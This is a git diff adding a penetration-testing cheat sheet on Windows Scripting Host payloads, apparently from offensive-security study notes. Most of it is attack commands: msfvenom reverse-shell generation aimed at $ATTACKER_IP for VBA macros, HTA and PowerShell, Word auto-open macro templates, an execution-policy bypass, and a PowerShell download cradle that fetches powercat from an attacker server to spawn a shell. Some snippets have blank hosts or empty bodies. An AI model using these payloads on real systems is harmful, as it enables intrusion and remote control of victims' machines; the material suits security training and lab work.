diff --git a/exploit/windows/payloads/windows_scripting_host.md b/exploit/windows/payloads/windows_scripting_host.md new file mode 100644 index 0000000..7d810b9 --- /dev/null +++ b/exploit/windows/payloads/windows_scripting_host.md @@ -0,0 +1,92 @@ +# Windows Scripting Host (WSH) + + +## Visual Basic Script (VB Script) +* `cscript file.exe`, command line scripts +* `wscript file.exe`, UI scripts + +* Example (watch out for the whitespace after path, it has to be included) +```sh +Set shell = WScript.CreateObject("Wscript.Shell") +shell.Run("C:\Windows\System32\cmd.exe " & WScript.ScriptFullName),0,True +``` +```sh +c:\Windows\System32>wscript /e:VBScript c:\Users\user\Documents\shell.txt +``` + +## Visual Basic for Application (VBA) +* Access Windows API via Macros +* Open Word, `view` --> `macros`, give a name and select document in `Macros in` +* Create reverse shell +```sh +msfvenom -p windows/meterpreter/reverse_tcp LHOST=$ATTACKER_IP LPORT=4448 -f vba +``` +* Insert into the following Macro Content, `Workbook_Open()` for excel, `Document_Open()` for Word macros +```sh +Sub Document_Open() + SHELL +End Sub + +Sub AutoOpen() + SHELL +End Sub + +Sub SHELL() + +End Sub +``` + +## HTML Application (HTA) + +* HTML file including some kind of scripting language like JS, VB, ActiveX +* `mshta` is used to excecute + +### POC +* Download file via attacker's web server +* File should look like +```HTML + + + + + +``` +* Save Document in a macros supporting file format like `Word 97-2003 Template` and `Word 97-2003 Document` + + +### Reverse Shell +* Craft reverse shell via `msfvenom` +```sh +msfvenom -p windows/x64/shell_reverse_tcp LHOST=$ATTACKER_IP LPORT=4448 -f hta-psh -o shell.hta +``` +* `msfconsole` via +```sh +use exploit/windows/misc/hta_server +``` + +## Powershell + +* Powershell execution policy can be checked via +```sh +Get-ExecutionPolicy +``` +* Set policy via +```sh +Set-ExecutionPolicy -Scope CurrentUser RemoteSigned +``` +* Bypass via +```sh +powershell -ex bypass -File shell.ps1 +``` +* Load [powercat](https://github.com/besimorhino/powercat.git) on attacker machine and load it on the target via +```sh +C:\Users\thm\Desktop> powershell -c "IEX(New-Object System.Net.WebClient).DownloadString('http://:8000/powercat.ps1');powercat -c -p 4448 -e cmd" +``` +* Or use msfvenom +```sh +msfvenom -p windows/x64/shell_reverse_tcp LHOST= LPORT=4447 -f psh -o payload.ps1 +``` +